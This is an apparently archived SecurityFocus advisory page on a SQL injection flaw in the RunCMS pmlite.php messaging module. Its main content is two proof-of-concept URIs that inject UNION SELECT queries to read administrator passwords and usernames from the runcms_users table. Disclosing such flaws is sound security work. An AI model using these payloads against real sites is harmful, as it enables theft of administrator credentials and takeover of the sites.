Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

RunCMS PMLite.PHP SQL Injection Vulnerability


An exploit is not required.

The following prooc of concept URI are available:
http://www.example.com/modules/messages/pmlite.php?send=2&to_userid=-1%20union%20%20%20%20select%20pass%20from%20runcms_users%20where%20level=5
http://www.example.com/modules/messages/pmlite.php?send=2&to_userid=-1/**/union/**/select/**/uname/**/from/**/runcms_users%20where%20level=5/*hamid-network-security-team-http://hamid.ir







 

Privacy Statement
Copyright 2009, SecurityFocus